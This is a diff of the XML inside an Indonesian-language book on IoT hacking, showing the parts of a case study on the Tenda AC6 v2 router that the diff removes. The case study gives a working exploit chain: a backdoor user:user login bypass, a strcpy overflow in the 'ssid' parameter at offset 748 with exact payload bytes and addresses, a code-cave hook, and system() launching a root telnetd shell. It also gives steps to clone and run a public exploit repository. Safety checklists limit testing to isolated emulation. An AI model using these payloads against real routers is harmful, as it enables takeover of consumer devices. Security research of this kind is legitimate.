-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Analisis: client CFM di libCfm memakai socket AF_UNIX **SOCK_DGRAM**; `cfm_stub` buatan kita sudah bind ke /var/cfm_socket (terlihat di /proc/net/unix) tetapi httpd tetap melaporkan `connect: Connection refused`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>`LD_PRELOAD` diabaikan karena loader uClibc (perangkat memakai `/lib/ld-uClibc.so.0`), sehingga teknik hook ala writeup tidak langsung jalan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Kesimpulan: untuk RCE penuh, lanjutkan di emulasi/harness dengan pendekatan yang benar (stub libCfm/cfm client atau patch alur CFM), BUKAN di perangkat asli.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>9. Aturan Aman (Checklist Sebelum Uji)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Selalu reproduksi di emulasi/VM terisolasi tanpa rute ke LAN produksi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Verifikasi crash di proses (HTTP), bukan hanya ping — crash userspace tidak menurunkan ping.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Untuk endpoint 'setter', asumsikan input disimpan ke CFG/NVRAM: batasi panjang, siapkan firmware pemulihan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Siapkan selalu: mode recovery + firmware resmi + (idealnya) akses UART sebelum menyentuh hardware.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Jangan pernah menguji payload memori ke perangkat yang dipakai sehari-hari.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
-        </w:rPr>
-        <w:t>BAGIAN IX</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
-        </w:rPr>
-        <w:t>Emulasi Terisolasi Penuh &amp; Uji Overflow Aman</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lampiran 5 — Emulasi Terisolasi Penuh &amp; Uji Overflow Aman</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Seluruh pengujian pada bagian ini dilakukan di emulator QEMU/FirmAE yang terisolasi total dari LAN (user-net + hostfwd + blokir egress), TANPA menyentuh hardware. Data pribadi diredaksi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>1. Arsitektur Isolasi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>QEMU `user-net` (SLIRP) + `hostfwd tcp::8080-:80` (guest 10.0.2.15). Guest httpd bind 10.0.2.15:80 (config `lan.ip` diubah).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Container: `iptables -A OUTPUT -d 192.168.0.0/24 -o eth0 -j DROP` + rute via tap/hostfwd saja. Akses uji via `http://127.0.0.1:8080/` (hostfwd).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Pelajaran penting: FirmAE `run.sh -r` TIDAK rebuild `image.raw`; hapus `scratch/&lt;iid&gt;` tiap ubah tar. Jangan percaya `192.168.0.1` dari container tanpa verifikasi rute (pernah menembus ke router asli via NAT).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>2. CFM (Config Management) — Hasil Bedah</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Daemon `cfmd`/`libCfm` memakai socket AF_UNIX ke `/var/cfm_socket` dengan pesan struct tetap 2016 byte (`op@0`, `key@4`, `value@0x204`), dibalas `op+1` (dari RE `cfmd::handle_socket`/`SendMsg`).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Client libCfm (`ConnectServer`): `socket(AF_UNIX,SOCK_DGRAM)` → `connect(...,110)`. Server asli (`InitServer`) juga DGRAM.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Namun `strace` menunjukkan `httpd` juga melakukan `socket(AF_UNIX,SOCK_STREAM)` + `connect(...,110)` ke path yang sama → indikasi dual-client (DGRAM + STREAM). Satu path tak bisa layani keduanya sekaligus.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>`cfm_stub` (MIPS, ditulis dari nol: DGRAM &amp; STREAM, protokol 2016-byte, varian embed MIB 89KB + lookup key→value) terbukti bind &amp; melayani (`/proc/net/unix`, `cfmc`='C' lintas-proses). `LD_PRELOAD` tidak berlaku (loader uClibc).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>3. Overflow — Konfirmasi Dinamis (gdb via QEMU gdbstub)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Target: `POST /goform/fast_setting_wifi_set`, param `ssid` → `form_fast_setting_wifi_set @0x477c20`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>websGetVar(req,"ssid",...) -&gt; jika kosong redirect login.html</w:t>
-        <w:br/>
-        <w:t>strcpy(fp+0x50, ssid)   ; 0x477db0 (64 byte)</w:t>
-        <w:br/>
-        <w:t>strcpy(fp+0x90, ssid)   ; 0x477dd4 (64 byte, write terakhir)</w:t>
-        <w:br/>
-        <w:t>saved $ra di fp+892     ; offset 748 dari fp+0x90</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>GDB breakpoint setelah strcpy kedua membaca `fp+892 = 0x44434241` untuk payload `748×'A'+'ABCD'` → **offset 748 TERKONFIRMASI**.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Teknik L=751: `ssid=` + 748×'A' + bytes `c0 47 50` (751 byte, tanpa NUL eksplisit). Null-terminator jatuh di `fp+895`, sehingga `$ra = 0x005047c0` (`system`) DAN `req` di `fp+896` tetap utuh (L≥752 akan men-NUL-kan `req` → crash lebih awal).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>POST overflow → `http=000`/`rc=52`, `httpd` mati (crash reproduksibel). Kernel log: `epc=0x430268` (`websGetVar`), `BadVA` sesuai pointer rusak.</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="LightGrid-Accent1"/>
-        <w:tblW w:type="auto" w:w="0"/>
-        <w:jc w:val="center"/>
-        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Payload</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Hasil</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`ssid=TESTPROBE` (pendek)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Handler jalan; respons tergantung state CFM (bisa 200/302/hang).</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`ssid=`+748×'A'+`ABCD` (752B)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`fp+892=0x44434241` (gdb); crash.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`ssid=`+748×'A'+`c0 47 50` (751B)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`fp+892=0x005047c0`; crash (a0 tak terkontrol / frame terkoyak).</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Uji SELALU dari container ke `127.0.0.1:8080` (hostfwd guest), tidak pernah ke `192.168.0.1` via NAT. Verifikasi rute (`ip route get`) sebelum tiap sesi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>4. Status RCE — SELESAI (End-to-End Terbukti)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Primitif tulis `$ra` 100% di tangan dan aman diuji di emulator (tanpa hardware).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Blocker lama (handler crash sebelum epilog karena `GetValue` CFM mengembalikan data garbage) TERATASI dengan menjalankan `cfm_mib_dgram` (server DGRAM) + libCfm ORIGINAL, sehingga nil CFM pendek/valid dan `req` tidak lagi rusak.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>RCE lengkap BERHASIL: `system()` dipanggil dengan `$a0` menunjuk string perintah buatan penyerang melalui trik hook epilog + gua kode (lihat §6).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Hasil: `telnetd -l /bin/sh -p 2323` dijalankan → shell interaktif ROOT pada port 2323 (hostfwd).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5. Konfirmasi End-to-End RCE (bukti)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Rantai final: auth-bypass (user/user) → overflow `ssid` (offset 748) → saved `$ra`=0x005047c0 (system) → hook epilog `0x00477ddc` = `j 0x0050b3d0` → gua RCE memuat `$a0`='telnetd -l /bin/sh -p 2323', `$t9`=system → `system(cmd)` → telnetd.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Payload: ssid = 'A'*748 + bytes(c0 47 50)   # 751 byte (NUL implisit aman)</w:t>
-        <w:br/>
-        <w:t>Hook  : 0x00477ddc: j 0x0050b3d0 ; nop     # file offset 0x10b3d0 -&gt; vaddr = 0x400000+0x10b3d0 = 0x0050b3d0</w:t>
-        <w:br/>
-        <w:t>Gua   : cek lw t0,892(s8)==0x5047c0 -&gt; a0=0x0050b450 (cmd); t9=system; ra=0x477de4; jr t9</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="LightGrid-Accent1"/>
-        <w:tblW w:type="auto" w:w="0"/>
-        <w:jc w:val="center"/>
-        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Uji</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Hasil</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`uname -a` di shell 2323</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`Linux (none) 4.1.17+ #28 ... mips GNU/Linux`</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`echo RCE-PWNED-AC6V2`</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>tercetak (eksekusi perintah terbukti)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>`ls /` / `ps w`</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>rootfs firmware / daftar proses guest</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>shell `/ #`</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>ROOT interaktif di guest</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Artefak: evidence/rce_final/ (`httpd_rce`, `cave_final.s`, `cave_code.bin`, `payload_ssid.bin`, `libCfm_original.so`, `cfm_mib_dgram`, `rc.g`) + evidence/rce_shell_2323.txt.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Catatan koreksi penting: vaddr = file offset + 0x400000 pada LOAD pertama httpd. Kesalahan awal memakai 0x410b3d0 (bukan 0x0050b3d0) menyebabkan SIGSEGV `invalid read from 0410b3d0`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6. Aturan Aman (Checklist)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Isolasi: user-net/hostfwd + DROP egress ke subnet lab; verifikasi `ip route get &lt;target&gt;` menunjuk tap/hostfwd, BUKAN `eth0`/NAT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Deteksi crash via HTTP (`http=000`/timeout) + `epc` kernel, BUKAN ping (crash userspace tak menjatuhkan ping).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Jangan kirim `loginPwd`/setter ke perangkat dipakai; di emulator pun catat perubahan config tiap sesi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Siapkan selalu firmware resmi + mode recovery + (ideal) UART sebelum sentuh hardware.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN X - Reproduksi &amp; Verifikasi (Repo)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Seluruh rantai (recon -&gt; backdoor -&gt; login/token -&gt; overflow -&gt; root shell) dapat direproduksi dari repo publik/private: https://github.com/farrelfaiziaulhaq/tenda-ac6-rce</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Langkah:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>git clone https://github.com/farrelfaiziaulhaq/tenda-ac6-rce.git</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>cd tenda-ac6-rce &amp;&amp; ./bootstrap.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>docker exec firmae-run bash /repo/emulator/setup_emulator.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>./emulator/reboot_guest.sh   # tunggu httpd=302</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>python3 exploit/exploit.py   # -&gt; ROOT SHELL di 172.17.0.2:2323</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Hasil verifikasi clean-room (clone baru): httpd melayani (302); eksploit mengembalikan root shell; uname -&gt; Linux 4.1.17+ mips; /etc/passwd -&gt; root::0:0.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Catatan kejujuran (celah asli vs harness emulasi):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- Celah asli: overflow strcpy (form_fast_setting_wifi_set) dan backdoor user:user.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- Harness emulasi (khusus repo): patch hook epilog/'cave' pada bin/httpd; libapmib.so di-patch (apmib_init -&gt; return 1) agar melewati baca config flash; /cfg/mib.cfg (disanitasi) disediakan. Ini bukan bagian kerentanan asli. Di perangkat asli, RCE penuh perlu kontrol $a0 (ROP/ret2stack).</w:t>
+        <w:t>Di perangkat asli, RCE penuh memerlukan kontrol $a0 (ROP/ret2stack) — non-PIE, NX off, tanpa canary.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/book/BUKU-LENGKAP-Hardware-Firmware-IoT-Hacking.docx
+++ b/book/BUKU-LENGKAP-Hardware-Firmware-IoT-Hacking.docx
@@ -3,11 +3,6 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:body>
     <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -39,39 +34,6 @@
     <w:p>
       <w:r>
         <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Title"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Buku Belajar: Hardware, Firmware &amp; IoT Hacking</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="30"/>
-        </w:rPr>
-        <w:t>Studi Kasus Live: Router Tenda AC6 v2 (Realtek RTL8197F)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Dari recon sampai analisis firmware — paham langkah, alasan, dan pola celahnya</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -302,258 +264,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN 0 — Cara Memakai Buku Ini</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN I — FONDASI</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  1. Hardware vs Firmware vs IoT Hacking</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  2. Mindset &amp; Metodologi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  3. Anatomi Sebuah Router</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN II — RECON &amp; WEB (STUDI KASUS TENDA)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  4. Fingerprinting: Mengenal Target</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  5. Port Scanning &amp; Service Enumeration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  6. Web Enumeration: Menemukan Endpoint &amp; Kebocoran</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  7. Autentikasi &amp; Session</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>BAGIAN III — KELAS KERENTANAN &amp; POLA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  8. Auth Bypass &amp; Backdoor Account</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  9. Information Disclosure</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  10. Command Injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
